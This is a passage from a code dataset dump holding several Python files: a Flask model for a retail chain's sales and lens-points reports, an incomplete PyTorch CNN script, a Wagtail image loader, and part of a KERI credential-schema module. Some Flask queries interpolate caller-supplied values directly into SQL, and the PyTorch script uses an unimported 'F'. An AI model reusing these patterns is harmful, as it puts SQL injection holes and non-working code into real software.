getGrupoFilialTemporario(self):\n ''' Retorna o grupo e filial selecionado '''\n grupo_filial = [\"'%02d%02d'\" % (int(num), int(lj)) for num in str(session['grupo_temporario']).split(',')\n for lj in range(1,3)]\n return ','.join(grupo_filial)\n \n def getLentesPontuacao(self, novos_pontos = False):\n '''Recupera todas as lentes que fazem parte da campanha de pontuacao e as retorna como um dicionario '''\n if novos_pontos == True:\n SQL = \"\"\" SELECT codigo, novos_pontos FROM adm_lentes_campanha ORDER BY pontos DESC \"\"\"\n else:\n SQL = \"\"\" SELECT codigo, pontos FROM adm_lentes_campanha ORDER BY pontos DESC \"\"\"\n c = Consulta(SQL, my_usuario, my_senha, my_banco, my_servidor, tipo_sgbd = 'mysql', porta = my_porta)\n return {cod:pt for cod,pt in c.getRegistros()}\n \n def getLentesPontuacaoLoja(self, loja, de, ate, novos_pontos = False):\n ''' Recupera os pontos de cada vendedor baseado nas lentes que ele vendeu '''\n pontos = self.getLentesPontuacao(novos_pontos)\n cod = [\"'%s'\" % key for key in pontos.keys()]\n SQL = querys.SQL_PONTUACAO_LENTES_CAMPANHA % (querys.caso_meta_vendedor, \n de, ate, ','.join(cod), self.getGrupoFilial())\n c = Consulta(SQL, ms_usuario, ms_senha, ms_banco, ms_servidor, tipo_sgbd='mssql', porta=ms_porta)\n pt_vends = {}\n for reg in c.getRegistros():\n if reg[1] == '' or reg[1] is None:\n continue\n else:\n if not reg[0] in pt_vends.keys():\n pt_vends[reg[0]] = [reg[2], 0, 0]\n ## Somar a quantidade de lentes e os pontos obtidos\n pt_vends[reg[0]][1] += reg[4]\n pt_vends[reg[0]][2] += pontos[reg[3]] * reg[4]\n ## Retorna o pt_vends {cpf:[nome, qt_lentes, qt_pts]}\n return pt_vends\n\n ## Obtem o grupo_fil como o sistema p12 entende\n @staticmethod\n def get_grupo_fil(grupo, fil):\n ''' Recebe o grupo e a filial e os retorna '''\n # Os dois sao uma lista, vamos retornar o grupo_fil\n try:\n return ['%02d%02d' % (int(gr), int(fl)) for gr in grupo.split(',') \n for fl in fil.split(',')]\n except ValueError:\n return False\n\n ## Obtendo um dicionario dos nomes dos grupos selecionados\n @staticmethod\n def get_grupo_selecionado(grupo, nome = False):\n ''' Retorna uma lista do grupo selecionado '''\n if nome:\n numeros = [str(num) for num in grupo.split(',')]\n grpID = ','.join(numeros)\n SQL = \"SELECT id_grupo, nome FROM adm_grupo WHERE id_grupo IN(%s)\" % (grpID)\n c = Consulta(SQL, my_usuario, my_senha, my_banco, my_servidor, tipo_sgbd = 'mysql', porta = my_porta)\n return {idGrupo:nome.split('-')[1].strip() for idGrupo, nome in c.getRegistros()}\n else:\n return [int(num) for num in grupo.split(',')]\n ## Obtendo os menus do usuario baseado no id\n @staticmethod\n def get_menu(ID):\n ''' Retorna os menus do usuario baseado no id dele'''\n sql = \"\"\"SELECT am.familia, am.link, am.nome FROM adm_usuario au INNER JOIN adm_usuario_menu aum \n ON au.id_usuario = aum.id_usuario INNER JOIN adm_menu am ON aum.id_menu = am.id_menu \n WHERE aum.id_usuario = %d ORDER BY am.familia, am.nome \"\"\" % int(ID)\n c = Consulta(sql, my_usuario, my_senha, my_banco, my_servidor, tipo_sgbd = 'mysql', porta = my_porta)\n menu = {}\n for reg in c.getRegistros():\n if not reg[0] in menu.keys():\n menu[reg[0]] = []\n # RETIRAR A TAG a e trazer somente o href\n link = reg[1]\n inicio = link.find('href=') + len('href=') + 1\n fim = link[inicio:].find('>') - 1\n link = link[inicio:inicio+fim]\n \n menu[reg[0]].append([ link, reg[2] ])\n return menu\n \n def getEmail(self):\n return self.__email\n\n# Classe para utilitarios\nclass Utils:\n\n # Funcao que recupera o hash para uso 
da api do site\n @staticmethod\n def get_chave_api():\n ''' Esta funcao recupera a chave da api '''\n SQL = \"SELECT chave_api FROM adm_chave_api WHERE id_chave_api = 1\"\n c = Consulta(SQL, my_usuario, my_senha, my_banco, my_servidor, tipo_sgbd = 'mysql', porta = my_porta)\n return c.getRegistros()[0][0]\n\n ## Converter dinheiro\n @staticmethod\n def converter(valor):\n ## verificar se existe dois numeros apos o ponto\n valor = str(valor)\n verificar = len(valor[(valor.find('.')+1):])\n if verificar == 2:\n pass\n else:\n valor = valor+'0'\n # Substituir o ponto por virgula\n valor = valor.replace('.',',')\n\n # contador, a cada 3 x inserir um ponto\n x = 0 \n # a string que recebera cada caractere convertido\n d = ''\n # Pega o valor e reverte sua ordem\n rever = valor[::-1]\n # Caminha sobre cada caractere da string\n for i in rever:\n # Se o x for inferior a 4 entao vamos incrementar x e colocar o caractere\n if x < 4:\n x += 1\n d += i\n # X nao tem resto na divisao por tres, entao incluiremos o ponto e incrementamos x\n elif x % 3 == 0:\n d += '.' + i \n x += 1\n # X já e maior que 4 e nao e divisivel por 3, entao vamos incrementar x e adicionar o caractere a d\n else:\n d += i\n x += 1\n # Reverte novamente a string para o formato de ordem original\n d = d[::-1]\n temp = list(d)\n if d[0] == '.': # Se o primeiro caracter e ponto vamos remover\n temp[0] = ''\n d = ''.join(temp)\n elif d[0] == '-' and d[1] == '.': # Se tem sinal negativo e o primeiro caracter e ponto vamos remover\n temp[1] = ''\n \n d = 'R$ '+''.join(temp)\n\n return d\n\n @staticmethod\n def desconverter(valor):\n return float(valor.replace('R$', '').replace('.', '').replace(',', '.')) \n # Recebe os grupos e as lojas e monta os chaveamentos corretos retornando uma lista\n @staticmethod\n def get_grupos_formatados(grupos, filiais):\n grupos_exatos = [\n '0101','0102','0201','0301','0302', \n '0401','0402','0501','0502','0601','0701','0702', \n '0801','0901','1001','1002','1101','1102','1201','1301', \n '1401','1501','1601','1602','1701','1801'\n ]\n grp = []\n for gr in grupos:\n for fi in filiais:\n gr_fi = '%02d%02d' % (int(gr), int(fi))\n if gr_fi in grupos_exatos:\n grp.append(gr_fi)\n return grp\n # Recebe um objeto request.form e retorna um objeto {de, ate, grupos, lojas} ou erro {erro:}\n @staticmethod\n def valida_form(form):\n ''' RECEBE UM OBJETO request.form e retorna um objeto com os campos ou um erro'''\n dados = form.form\n\n # veja se tem um campo dados e se consegue converter este json\n if len(dados) < 2 and not 'dados' in form.form.keys():\n return {'erro': 'ESPERADO UM ATRIBUTO DADOS QUE NAO EXISTE'}\n elif len(dados) < 2:\n try:\n dados = json.loads(dados['dados'])\n except json.decoder.JSONDecodeError:\n return {'erro': 'FALHA, DADOS ENVIADOS NÃO SÃO UM JSON'}\n # Agora é fazer a extração dos campos (se existirem ou retornar os erros)\n if not 'de' in dados.keys():\n return {'erro': 'FAVOR ENVIAR O CAMPO de'}\n if not 'ate' in dados.keys():\n return {'erro': 'FAVOR ENVIAR O CAMPO ate'}\n if not 'lojas' in dados.keys():\n return {'erro': 'FAVOR INFORMAR O CAMPO lojas'}\n if not 'grupos' in dados.keys():\n return {'erro': 'FAVOR INFORMAR OS GRUPOS'}\n # VEJA NA regex SE O CAMPO DE E ATE ATENDEM O PADRÃO DE DATA\n cp = re.compile('^[1-2][0-9]{3}-([0][0-9]|[1][0-2])-([0-2][0-9]|[3][0-1])$')\n if not cp.match(dados['de']):\n return {'erro': 'O CAMPO de NÃO ATENDE AO FORMATO AAAA-MM-DD'}\n if not cp.match(dados['ate']):\n return {'erro': 'O CAMPO ate NÃO ATENDE AO FORMATO AAAA-MM-DD'}\n # OK PASSOU 
ATÉ AQUI, AGORA É VER SE O CAMPO de é menor_igual ao campo ate\n deL = list(map(lambda x: int(x), dados['de'].split('-')))\n ateL = list(map(lambda x: int(x), dados['ate'].split('-'))) \n dts = list(map(lambda x: date(*x), [deL, ateL]))\n if dts[0] > dts[1]:\n return {'erro': 'A DATA de NÃO PODE SER MAIOR QUE A DATA ate'}\n del deL, ateL, dts, cp # limpando a casa\n # TODAS AS VALIDACOES FINALIZADAS\n return dados\n \n @staticmethod\n def valida_dados(form):\n ''' RECEBE UM OBJETO request.form e retorna um objeto com os campos ou um erro'''\n dados = form.form\n\n # veja se tem um campo dados e se consegue converter este json\n if not 'dados' in dados.keys():\n return {'erro': 'ESPERADO UM ATRIBUTO DADOS QUE NAO EXISTE'}\n try:\n dados = json.loads(dados['dados'])\n except json.decoder.JSONDecodeError:\n return {'erro': 'FALHA, DADOS ENVIADOS NÃO SÃO UM JSON'}\n return dados\n @staticmethod\n def validar_data(data):\n ''' Valida a data para ver se segue o padrao AAAA-MM-DD'''\n # VEJA NA regex SE O CAMPO DE E ATE ATENDEM O PADRÃO DE DATA\n cp = re.compile('^[1-2][0-9]{3}-([0][0-9]|[1][0-2])-([0-2][0-9]|[3][0-1])$')\n if not cp.match(data):\n return False\n return True\n @staticmethod\n def validar_de_menor_igual_que_ate(de, ate):\n ''' Valida para ver se a data de é menor igual que a data ate'''\n if not Utils.validar_data(de) or not Utils.validar_data(ate):\n return {'erro': 'A de ou ate não estão no formato AAAA-MM-DD'}\n # Veja se uma data é maior que a outra\n d1 = date(*list(map(lambda x: int(x), de.split('-'))))\n d2 = date(*list(map(lambda x: int(x), ate.split('-'))))\n if d1 > d2:\n return {'erro': 'A DATA de é maior que a data ate'}\n return {'sucesso': 'VALIDO'}\n @staticmethod\n def validar_arquivo(arq, tipos_aceitos: list):\n ''' VALIDA O ARQUIVO ENVIADO DE ACORDO COM SUA EXTENSÃO retornando True, se passou ou False caso contrario'''\n return '.' 
in arq and arq.rsplit('.', 1)[1].lower() in tipos_aceitos\n # funcao que gira a imagem\n @staticmethod\n def rotacionar_imagem(filepath, size = None, novo_nome = None):\n ''' Rotacionar a imagem a posicao correta '''\n image = Image.open(filepath)\n exf = None\n for orientation in ExifTags.TAGS.keys():\n if ExifTags.TAGS[orientation] == 'Orientation':\n exf = orientation\n break\n if not exf is None and '_getexif' in dir(image) and not image._getexif() is None:\n exif = dict(image._getexif().items())\n if not exf in exif.keys():\n pass\n elif exif[exf] == 3:\n image = image.transpose(Image.ROTATE_180)\n elif exif[exf] == 6:\n image = image.transpose(Image.ROTATE_270)\n elif exif[exf] == 8:\n image = image.transpose(Image.ROTATE_90)\n \n # Se tiver a tupla de dimensoes, defina e salve\n if not size is None:\n image = image.resize(size, Image.ANTIALIAS)\n # Se tiver o novo nome então salve neste novocaminho\n if not novo_nome is None:\n image.save(novo_nome)\n else:\n image.save(filepath, quality=100)\n image.close()\n return True\n \n\n\n\n\n\n \n\n\n\n\n", "sub_path": "flask/modelo.py", "file_name": "modelo.py", "file_ext": "py", "file_size_in_byte": 37543, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "flask.session", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 27, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 29, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 45, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 46, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 50, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 60, "usage_type": "call"}, {"api_name": "pymysql.connect", "line_number": 119, "usage_type": "call"}, {"api_name": "pymssql.connect", "line_number": 121, "usage_type": "call"}, {"api_name": "pymysql.connect", "line_number": 236, "usage_type": "call"}, {"api_name": "pymssql.connect", "line_number": 238, "usage_type": "call"}, {"api_name": "pymongo.MongoClient", "line_number": 250, "usage_type": "call"}, {"api_name": "config.mongo_acesso", "line_number": 250, "usage_type": "attribute"}, {"api_name": "config.mongo_acesso", "line_number": 251, "usage_type": "attribute"}, {"api_name": "config.mongo_acesso", "line_number": 252, "usage_type": "attribute"}, {"api_name": "config.mongo_acesso", "line_number": 253, "usage_type": "attribute"}, {"api_name": "pymysql.connect", "line_number": 280, "usage_type": "call"}, {"api_name": "pymysql.connect", "line_number": 303, "usage_type": "call"}, {"api_name": "pymysql.connect", "line_number": 322, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 362, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 363, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 364, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 414, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 418, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 422, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 426, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 445, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 504, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 505, "usage_type": "name"}, {"api_name": 
"flask.session", "line_number": 511, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 517, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 521, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 525, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 529, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 540, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 546, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 550, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 717, "usage_type": "call"}, {"api_name": "json.decoder", "line_number": 718, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 730, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 738, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 754, "usage_type": "call"}, {"api_name": "json.decoder", "line_number": 755, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 762, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 772, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 773, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 785, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 785, "usage_type": "name"}, {"api_name": "PIL.ExifTags.TAGS.keys", "line_number": 787, "usage_type": "call"}, {"api_name": "PIL.ExifTags.TAGS", "line_number": 787, "usage_type": "attribute"}, {"api_name": "PIL.ExifTags", "line_number": 787, "usage_type": "name"}, {"api_name": "PIL.ExifTags.TAGS", "line_number": 788, "usage_type": "attribute"}, {"api_name": "PIL.ExifTags", "line_number": 788, "usage_type": "name"}, {"api_name": "PIL.Image.ROTATE_180", "line_number": 796, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 796, "usage_type": "name"}, {"api_name": "PIL.Image.ROTATE_270", "line_number": 798, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 798, "usage_type": "name"}, {"api_name": "PIL.Image.ROTATE_90", "line_number": 800, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 800, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 804, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 804, "usage_type": "name"}]} +{"seq_id": "191852549", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 2 21:51:05 2019\n\n@author: vaish\n\"\"\"\nimport torch\nimport os\nfrom skimage import io, transform\nimport numpy as np\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms, utils\nimport torch.nn as nn\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = nn.Conv2d(1, 32, 3, 1)\n self.conv2 = nn.Conv2d(32, 64, 3, 1)\n self.dropout1 = nn.Dropout2d(0.25)\n self.dropout2 = nn.Dropout2d(0.5)\n self.fc1 = nn.Linear(9216, 128)\n self.fc2 = nn.Linear(128, 10)\n \n def forward(self, x):\n x = self.conv1(x)\n x = F.relu(x)\n x = self.conv2(x)\n x = F.max_pool2d(x, 2)\n x = self.dropout1(x)\n x = torch.flatten(x, 1)\n x = self.fc1(x)\n x = F.relu(x)\n x = self.dropout2(x)\n x = self.fc2(x)\n output = F.log_softmax(x, dim=1)\n return output\n\nclass getData(Dataset):\n def __init__(self, data, transform=None):\n\n self.data = data[0]\n self.target = data[1]\n self.transform = transform\n print(self.data.shape)\n print(self.target.shape)\n def __len__(self):\n return len(self.target)\n\n def __getitem__(self, idx):\n 
if torch.is_tensor(idx):\n idx = idx.tolist()\n \n data = self.data[:,:,idx]\n target = self.target[idx]\n #print(data.shape)\n #print(target)\n sample = {'data': data, 'target': target}\n\n if self.transform:\n sample['data'] = self.transform(sample['data'])\n return sample\n\n\ndef CNN_1(data,trainSet):\n transformed_dataset = getData(data=(data['x'][:,:,data['set']==trainSet], data['y'][data['set']==trainSet]),\n transform=transforms.Compose([\n transforms.ToTensor()\n ]))\n \n dataloader = DataLoader(transformed_dataset, batch_size=64,\n shuffle=True)\n \n for i_batch, sample_batched in enumerate(dataloader):\n print(i_batch, sample_batched['data'].size(),\n sample_batched['target'].size())\n model = Net()", "sub_path": "code/untitled2.py", "file_name": "untitled2.py", "file_ext": "py", "file_size_in_byte": 2274, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "torch.nn.Module", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.nn.Dropout2d", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.Dropout2d", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.flatten", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.utils.data.Dataset", "line_number": 39, "usage_type": "name"}, {"api_name": "skimage.transform", "line_number": 44, "usage_type": "name"}, {"api_name": "torch.is_tensor", "line_number": 51, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 67, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 67, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 68, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 68, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "584516343", "text": "import os\nimport logging\n\nfrom django.conf import settings\nfrom django.core.files import File\n\nfrom wagtail.images import get_image_model\n\nlogger = logging.getLogger(\"fake users:\")\nImage = get_image_model()\n\ndef create_dir_if_not_exists(directory):\n if not os.path.exists(directory):\n os.mkdir(directory)\n\ncreate_dir_if_not_exists(settings.MEDIA_ROOT)\ncreate_dir_if_not_exists(settings.DOWNLOADS_ROOT)\ncreate_dir_if_not_exists(settings.IMAGE_DOWNLOADS_DIR)\ncreate_dir_if_not_exists(settings.AVATAR_DOWNLOADS_DIR)\n\ndef create_wagtail_image(filename):\n filepath = os.path.join(settings.IMAGE_DOWNLOADS_DIR, filename)\n with open(filepath, \"rb\") as file:\n image_file = File(file)\n return Image.objects.create(file=image_file, title=filename)\n\n\ndef create_wagtail_images():\n images = []\n files = 
os.listdir(settings.IMAGE_DOWNLOADS_DIR)\n for file in files:\n images.append(create_wagtail_image(file))\n logger.info(\n f'Successfully created image: {file}'\n )\n return images\n", "sub_path": "backend/part-5/engineerx/images/modules/fakedata.py", "file_name": "fakedata.py", "file_ext": "py", "file_size_in_byte": 1040, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "wagtail.images.get_image_model", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 16, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 16, "usage_type": "name"}, {"api_name": "django.conf.settings.DOWNLOADS_ROOT", "line_number": 17, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 17, "usage_type": "name"}, {"api_name": "django.conf.settings.IMAGE_DOWNLOADS_DIR", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 18, "usage_type": "name"}, {"api_name": "django.conf.settings.AVATAR_DOWNLOADS_DIR", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 19, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "django.conf.settings.IMAGE_DOWNLOADS_DIR", "line_number": 22, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 22, "usage_type": "name"}, {"api_name": "django.core.files.File", "line_number": 24, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 30, "usage_type": "call"}, {"api_name": "django.conf.settings.IMAGE_DOWNLOADS_DIR", "line_number": 30, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "339633062", "text": "# -*- encoding: utf-8 -*-\n\"\"\"\nkeri.core.scheming module\n\nself-addressing and schema support\n\"\"\"\n\nimport json\n\nimport cbor2 as cbor\nimport jsonschema\nimport msgpack\n\nfrom . import coring\nfrom .coring import MtrDex, Serials, Saider, Ids\nfrom .. 
import help\nfrom ..kering import ValidationError, DeserializationError\n\nlogger = help.ogler.getLogger()\n\n\nclass CacheResolver:\n \"\"\"\n Sample jsonschema resolver for loading schema $ref references from a local hash.\n\n \"\"\"\n\n def __init__(self, cache=None):\n \"\"\"\n Create a jsonschema resolver that can be used for loading references to schema remotely.\n\n Parameters:\n cache (dict) is an optional pre-loaded cache of schema\n \"\"\"\n self.cache = cache if cache is not None else dict()\n\n def add(self, key, schema):\n \"\"\"\n Add schema to cache for resolution\n\n Parameters:\n key (str) URI to resolve to the schema\n schema (bytes) is bytes of the schema for the URI\n \"\"\"\n self.cache[key] = schema\n\n def resolve(self, uri):\n if uri not in self.cache:\n return None\n\n ref = self.cache[uri]\n return ref\n\n def handler(self, uri):\n \"\"\"\n Handler provided to jsonschema for cache resolution\n\n Parameters:\n uri (str) the URI to resolve\n \"\"\"\n ref = self.resolve(uri)\n if not ref:\n return None\n\n schemr = Schemer(raw=ref)\n return schemr.sed\n\n def resolver(self, scer=b''):\n \"\"\"\n Returns a jsonschema resolver for returning locally cached schema based on self-addressing\n identifier URIs.\n\n Parameters:\n scer (bytes) is the source document that is being processed for reference resolution\n\n \"\"\"\n return jsonschema.RefResolver(\"\", scer, handlers={\"did\": self.handler})\n\n\njsonSchemaCache = CacheResolver(cache={\n \"EFBMQwQ1fv_bEBpqrom0EHLytFZiP5tWAs5HUpaa-WUg\": b'{\"$id\":\"EFBMQwQ1fv_bEBpqrom0EHLytFZiP5tWAs5HUpaa-WUg\",'\n b'\"$schema\":\"http://json-schema.org/draft-07/schema#\",'\n b'\"title\":\"Legal Entity Official Organizational Role vLEI '\n b'Credential\",\"description\":\"A vLEI Role Credential issued by a '\n b'Qualified vLEI issuer to official representatives of a Legal '\n b'Entity\",\"properties\":{\"v\":{\"type\":\"string\"},'\n b'\"d\":{\"type\":\"string\"},\"i\":{\"type\":\"string\"},'\n b'\"s\":{\"description\":\"schema SAID\",\"type\":\"string\"},'\n b'\"a\":{\"description\":\"data block\",\"properties\":{\"d\":{'\n b'\"type\":\"string\"},\"i\":{\"type\":\"string\"},'\n b'\"dt\":{\"description\":\"issuance date time\",\"format\":\"date-time\",'\n b'\"type\":\"string\"},\"ri\":{\"description\":\"credential status '\n b'registry\",\"type\":\"string\"},\"LEI\":{\"type\":\"string\"},'\n b'\"personLegalName\":{\"type\":\"string\"},\"officialRole\":{'\n b'\"type\":\"string\"},\"t\":{\"contains\":{'\n b'\"const\":\"LegalEntityOfficialOrganizationalRolevLEICredential\"},'\n b'\"type\":\"array\"}},\"additionalProperties\":false,\"required\":[\"i\",'\n b'\"dt\",\"ri\",\"LEI\",\"personLegalName\",\"officialRole\",\"t\"],'\n b'\"type\":\"object\"},\"p\":{\"contains\":{\"type\":\"object\"},'\n b'\"description\":\"source block\",\"items\":{\"properties\":{'\n b'\"legalEntityvLEICredential\":{\"description\":\"chain to issuer '\n b'credential\",\"properties\":{\"d\":{\"type\":\"string\"},'\n b'\"i\":{\"type\":\"string\"}},\"additionalProperties\":false,'\n b'\"type\":\"object\"}},\"additionalProperties\":false,\"required\":['\n b'\"legalEntityvLEICredential\"],\"type\":\"object\"},\"maxItems\":1,'\n b'\"minItems\":1,\"type\":\"array\"}},\"additionalProperties\":false,'\n b'\"required\":[\"i\",\"s\",\"d\"],\"type\":\"object\"}',\n \"EC9rQ-xi_3cRrjANStL6tn6Kn4Z444r9rvTr_Vfi-750\": b'{\"$id\":\"EC9rQ-xi_3cRrjANStL6tn6Kn4Z444r9rvTr_Vfi-750\",'\n b'\"$schema\":\"http://json-schema.org/draft-07/schema#\",'\n b'\"title\":\"Legal Entity vLEI 
Credential\",\"description\":\"A vLEI '\n b'Credential issued by a Qualified vLEI issuer to a Legal '\n b'Entity\",\"properties\":{\"v\":{\"type\":\"string\"},'\n b'\"d\":{\"type\":\"string\"},\"i\":{\"type\":\"string\"},'\n b'\"s\":{\"description\":\"schema SAID\",\"type\":\"string\"},'\n b'\"a\":{\"description\":\"data block\",\"properties\":{\"d\":{'\n b'\"type\":\"string\"},\"i\":{\"type\":\"string\"},'\n b'\"dt\":{\"description\":\"issuance date time\",\"format\":\"date-time\",'\n b'\"type\":\"string\"},\"ri\":{\"description\":\"credential status '\n b'registry\",\"type\":\"string\"},\"LEI\":{\"type\":\"string\"},'\n b'\"t\":{\"contains\":{\"const\":\"LegalEntityvLEICredential\"},'\n b'\"type\":\"array\"}},\"additionalProperties\":false,\"required\":[\"i\",'\n b'\"dt\",\"ri\",\"LEI\",\"t\"],\"type\":\"object\"},\"p\":{\"contains\":{'\n b'\"type\":\"object\"},\"description\":\"source block\",'\n b'\"items\":{\"properties\":{\"qualifiedvLEIIssuervLEICredential\":{'\n b'\"description\":\"chain to issuer credential\",\"properties\":{\"d\":{'\n b'\"type\":\"string\"},\"i\":{\"type\":\"string\"}},'\n b'\"additionalProperties\":false,\"type\":\"object\"}},'\n b'\"additionalProperties\":false,\"required\":['\n b'\"qualifiedvLEIIssuervLEICredential\"],\"type\":\"object\"},'\n b'\"maxItems\":1,\"minItems\":1,\"type\":\"array\"},\"r\":{\"contains\":{'\n b'\"type\":\"object\"},\"description\":\"rules block\",\"type\":\"array\"}},'\n b'\"additionalProperties\":false,\"required\":[\"i\",\"s\",\"d\"],'\n b'\"type\":\"object\"}',\n \"EMNumLS-O9ScGskk8h4xHvoiAeQf-CDW6KU3LoDUiz3o\": b'{\"$id\":\"EMNumLS-O9ScGskk8h4xHvoiAeQf-CDW6KU3LoDUiz3o\",'\n b'\"$schema\":\"http://json-schema.org/draft-07/schema#\",'\n b'\"title\":\"Legal Entity Engagement Context Role vLEI Credential\",'\n b'\"description\":\"A vLEI Role Credential issued to representatives '\n b'of a Legal Entity in other than official roles but in '\n b'functional or other context of engagement\",\"properties\":{\"v\":{'\n b'\"type\":\"string\"},\"d\":{\"type\":\"string\"},\"i\":{\"type\":\"string\"},'\n b'\"s\":{\"description\":\"schema SAID\",\"type\":\"string\"},'\n b'\"a\":{\"description\":\"data block\",\"properties\":{\"d\":{'\n b'\"type\":\"string\"},\"i\":{\"type\":\"string\"},'\n b'\"dt\":{\"description\":\"issuance date time\",\"format\":\"date-time\",'\n b'\"type\":\"string\"},\"ri\":{\"description\":\"credential status '\n b'registry\",\"type\":\"string\"},\"LEI\":{\"type\":\"string\"},'\n b'\"personLegalName\":{\"type\":\"string\"},\"engagementContextRole\":{'\n b'\"type\":\"string\"},\"t\":{\"contains\":{'\n b'\"const\":\"LegalEntityEngagementContextRolevLEICredential\"},'\n b'\"type\":\"array\"}},\"additionalProperties\":false,\"required\":[\"i\",'\n b'\"dt\",\"ri\",\"LEI\",\"personLegalName\",\"engagementContextRole\",\"t\"],'\n b'\"type\":\"object\"},\"p\":{\"contains\":{\"type\":\"object\"},'\n b'\"description\":\"source block\",\"items\":{\"properties\":{'\n b'\"legalEntityvLEICredential\":{\"description\":\"chain to issuer '\n b'credential\",\"properties\":{\"d\":{\"type\":\"string\"},'\n b'\"i\":{\"type\":\"string\"}},\"additionalProperties\":false,'\n b'\"type\":\"object\"}},\"additionalProperties\":false,\"required\":['\n b'\"legalEntityvLEICredential\"],\"type\":\"object\"},\"maxItems\":1,'\n b'\"minItems\":1,\"type\":\"array\"}},\"additionalProperties\":false,'\n b'\"required\":[\"i\",\"s\",\"d\"],\"type\":\"object\"}',\n \"ES63gXI-FmM6yQ7ISVIH__hOEhyE6W6-Ev0cArldsxuc\": 
